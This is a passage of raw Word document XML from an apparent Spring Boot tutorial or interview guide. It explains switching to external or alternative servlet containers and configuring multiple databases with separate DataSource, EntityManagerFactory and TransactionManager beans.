    </w:p>
    <w:p w14:paraId="2C070366"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key-store-password: password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241A18C7"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key-store-type: JKS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18355107"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key-alias: myalias</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50723F00" w14:textId="77777777" w:rsidR="00754045" w:rsidRPr="002C6305" w:rsidRDefault="0075404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4. Configuring an External Server (Non-Embedded)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E7CB73"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f you want to use an external servlet container (like Tomcat, Jetty, or Undertow) instead of the embedded server, you can configure it by excluding the default embedded server and adding the desired server as a dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C74DC8F" w14:textId="77777777" w:rsidR="00754045" w:rsidRPr="002C6305" w:rsidRDefault="0075404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Example for External Tomcat Server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3E355E"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clude the default embedded Tomcat dependency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F91FB58"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your pom.xml (for Maven), add:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E64082D"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0E9AA2CF"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org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D64876F"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spring-boot-starter-tomcat&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AC9BEA"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scope&gt;provided&lt;/scope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE6641C"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4D9B42A3"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dd the external Tomcat dependency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58585775"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50200117"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org.apache.tomcat&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D6A42C"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tomcat-servlet-api&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23651D81"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version&gt;9.0.41&lt;/version&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79299887"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scope&gt;provided&lt;/scope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCD7BDD"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25159AD7"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reate a ServletWebServerFactory Bean (optional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E1DD82"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customize your external Tomcat server by defining a ServletWebServerFactory bean, as shown in the programmatic configuration section above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFB8EEF" w14:textId="77777777" w:rsidR="00754045" w:rsidRPr="002C6305" w:rsidRDefault="0075404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5. Customizing Other Embedded Servers (Jetty/Undertow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA71DF9"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f you prefer using Jetty or Undertow instead of Tomcat, you can add their dependencies and configure them similarly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5235A74F" w14:textId="77777777" w:rsidR="00754045" w:rsidRPr="002C6305" w:rsidRDefault="0075404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Example for Jetty Server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6050F9"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clude Tomcat and add Jetty dependency in pom.xml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0F410A"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2D3EFBB8"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org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644B8893"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spring-boot-starter-jetty&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C35B39"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218F8229" w14:textId="77777777" w:rsidR="00754045" w:rsidRPr="002C6305" w:rsidRDefault="00754045" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19811A51"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08DB4A7B"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org.eclipse.jetty&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC4F4DF"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jetty-server&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F304F3"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0311B460"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Jetty-specific configurations are similar to the ones used for Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, such as adjusting server port or setting SSL configurations, with a JettyServletWebServerFactory in the same way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59416F09" w14:textId="77777777" w:rsidR="00754045" w:rsidRPr="002C6305" w:rsidRDefault="0075404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Example for Undertow Server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4D93E6"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clude Tomcat and add Undertow dependency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412FB10D"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lt;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA81909"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org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D55BE5"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spring-boot-starter-undertow&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583309B3"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390809FE" w14:textId="77777777" w:rsidR="00754045" w:rsidRPr="002C6305" w:rsidRDefault="0075404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6. Customizing SSL for External Servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047439AE"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f you're using an external server like Tomcat, Jetty, or Undertow, SSL configuration will depend on how you configure your external server. Usually, it involves setting properties in server.xml or application.properties as mentioned previously for embedded servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D58AF8" w14:textId="77777777" w:rsidR="0075404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1A78A3F">
          <v:rect id="_x0000_i2669" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1041463B" w14:textId="77777777" w:rsidR="00754045" w:rsidRPr="002C6305" w:rsidRDefault="0075404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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332FFBE8"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o configure a custom server in a Spring Boot application, you can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DFCF24"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e application.properties or application.yml for basic configuration (e.g., port, address, context path).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1A8C70"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rogrammatically customize the server using WebServerFactoryCustomizer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688AA842"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Optionally, switch to an external server like Jetty or Undertow by modifying your dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A65EAAF"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e SSL if required, either through properties or custom server configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E8F4F9" w14:textId="77777777" w:rsidR="00754045" w:rsidRPr="002C6305" w:rsidRDefault="0075404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approach provides flexibility in how you want your Spring Boot application to run and interact with the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD4E4C9" w14:textId="778FBE94"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8C20D93">
          <v:rect id="_x0000_i2670" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5900EC" w14:textId="38C0E07D" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="636" w:name="_Toc196308116"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to configure multiple databases in a Spring boot application</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="636"/>
    </w:p>
    <w:p w14:paraId="6E05D422" w14:textId="0E53573C" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30"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ing multiple databases in a Spring Boot application requires setting up multiple DataSource beans, EntityManagerFactory, and TransactionManager for each database. Spring Boot supports this by allowing you to create multiple configuration classes that define the settings for each database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A81CC7" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30"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teps to Configure Multiple Databases in Spring Boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C64E504" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30"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Add Dependencies for Multiple Databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B2CBDB"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sure you have dependencies for both databases in your pom.xml (for Maven). If you're using two databases like MySQL and PostgreSQL, your dependencies would look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77435EB5"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ies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9530E6"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 Primary Database (e.g., MySQL) --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C81DE2A"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D34DFC7"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org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0079AC24"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spring-boot-starter-data-jpa&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CD8232"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25089CF2"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5679BA9E"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mysql&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F91CE9"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mysql-connector-java&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD6E47E"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6808AB69" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FA4BBE1"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 Secondary Database (e.g., PostgreSQL) --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC86D52"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D16C0AC"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org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEA772E"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spring-boot-starter-data-jpa&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EADA61"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C89DB1"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38568311"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org.postgresql&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EEEF13"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postgresql&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E56AC2F"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E18395A" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="725D06F6"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 Other dependencies --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E10054"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ies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D6852F" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30"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Define Configuration for Each Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C040DA"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will need to create separate configuration classes for each database. These classes define the DataSource, EntityManagerFactory, and TransactionManager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5584D0CC" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30"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For Primary Database (e.g., MySQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634B07A3"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reate a configuration class for the primary database (e.g., DataSource1Config):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5070D6C6"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ation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EC4C9D"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ableTransactionManagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B43DEFA"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EnableJpaRepositories(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CE02A6"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asePackages = "com.example.repository.primary",  // Package for Primary Database Repositories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B486E72"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ntityManagerFactoryRef = "primaryEntityManagerFactory",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C20AF1"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ransactionManagerRef = "primaryTransactionManager"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332A9F63"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053158A8"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DataSource1Config {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5122E7A4" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="431D6AC6"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mary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9612DB"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ean(name = "primaryDataSource")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5E4F19"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ConfigurationProperties(prefix = "spring.datasource.primary")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0D4F5F"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DataSource dataSource() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAAA875"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DataSourceBuilder.create().build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0D6C25"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0FFA808A" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1821F159"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mary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6934942F"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ean(name = "primaryEntityManagerFactory")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2125B966"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LocalContainerEntityManagerFactoryBean entityManagerFactory(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F464E3A"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ntityManagerFactoryBuilder builder,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0733EE8D"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Qualifier("primaryDataSource") DataSource dataSource) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5344C7"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builder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8270EB"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dataSource(dataSource)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2632AD22"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ackages("com.example.model.primary")  // Package for Primary Database Entities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0128A8F4"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ersistenceUnit("primary")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE64394"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uild();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBB3B51"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1CDF5A66" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F9BAD38"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mary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52511B57"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ean(name = "primaryTransactionManager")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C92C09C"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PlatformTransactionManager transactionManager(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F3D8A4"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Qualifier("primaryEntityManagerFactory") EntityManagerFactory entityManagerFactory) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CAFFB7"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JpaTransactionManager(entityManagerFactory);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC0FE4E"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05E89C41"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7BF19A4" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30"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For Secondary Database (e.g., PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094792FB"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imilarly, create a configuration class for the secondary database (e.g., DataSource2Config):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DE57F7"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ation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E15BBA"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ableTransactionManagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D889C80"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ableJpaRepositories(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE8C19B"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asePackages = "com.example.repository.secondary",  // Package for Secondary Database Repositories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48581F64"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ntityManagerFactoryRef = "secondaryEntityManagerFactory",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B90F20"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ransactionManagerRef = "secondaryTransactionManager"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118629A0"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2F7A149"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DataSource2Config {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F35645" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22416C5C"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ean(name = "secondaryDataSource")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E6D05A"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ConfigurationProperties(prefix = "spring.datasource.secondary")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD3D8C0"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DataSource dataSource() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792EFF3C"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DataSourceBuilder.create().build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B029790"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4D7D1F0B" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="541CB785"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ean(name = "secondaryEntityManagerFactory")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB950F1"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LocalContainerEntityManagerFactoryBean entityManagerFactory(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C630F69"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ntityManagerFactoryBuilder builder,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F52EB50"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Qualifier("secondaryDataSource") DataSource dataSource) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1A306E"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builder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C0DA08"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dataSource(dataSource)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F793839"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 xml:space="preserve">                .packages("com.example.model.secondary")  // Package for Secondary Database Entities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186EE250"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ersistenceUnit("secondary")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ECD76C"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uild();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49114B8F"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78C9A92" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2812A2EA"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ean(name = "secondaryTransactionManager")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E00B69C"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PlatformTransactionManager transactionManager(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6A6314"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Qualifier("secondaryEntityManagerFactory") EntityManagerFactory entityManagerFactory) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0867B908"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JpaTransactionManager(entityManagerFactory);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E321551"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2687AC0"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D39E5AC" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30"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Configure Database Properties in application.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612CF417"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will need to configure the database properties for each database separately in the application.properties (or application.yml) file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149CF2E5" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30"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For Primary Database (e.g., MySQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641EFB2E"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primary.url=jdbc:mysql://localhost:3306/primarydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1396F233"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primary.username=root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D643E1"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primary.password=root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F6CECD"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primary.driver-class-name=com.mysql.cj.jdbc.Driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556873ED"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primary.jpa.hibernate.ddl-auto=update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233422B1"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jpa.properties.hibernate.dialect=org.hibernate.dialect.MySQL5Dialect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2223A0BE" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30"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For Secondary Database (e.g., PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDA5497"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secondary.url=jdbc:postgresql://localhost:5432/secondarydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EC0E35"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secondary.username=postgres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E9C991"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secondary.password=postgres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE69000"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secondary.driver-class-name=org.postgresql.Driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2F1F0C"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secondary.jpa.hibernate.ddl-auto=update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C70166"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jpa.properties.hibernate.dialect=org.hibernate.dialect.PostgreSQLDialect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8D9194" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30"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4. Define Repositories for Each Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B16A76A"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Make sure your repositories are defined in the correct package. For the primary and secondary databases, you can have separate repository interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2186BF"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rimary Database Repositories</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in com.example.repository.primary):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143AFCD2"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pository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3601B6F1"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interface EmployeeRepository extends JpaRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD40D4B"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340EFCF8"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econdary Database Repositories</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in com.example.repository.secondary):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0B8059"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pository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A47B065"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interface DepartmentRepository extends JpaRepository&lt;Department, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B46F946"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3CD59918" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30"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5. Use the Repositories in Service Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695EFD11"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your service layer, you can inject the repositories for each database as needed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1F5CB9"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ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A352675"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EmployeeService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44113D15" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64611BA7"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7C6ECB60"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EmployeeRepository employeeRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417D2FCA" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A9F336B"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4884844F"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DepartmentRepository departmentRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED4AF08" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="604B81B3"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Employee saveEmployee(Employee employee) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBB87EB"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employeeRepository.save(employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745A1EAE"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4057F106" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
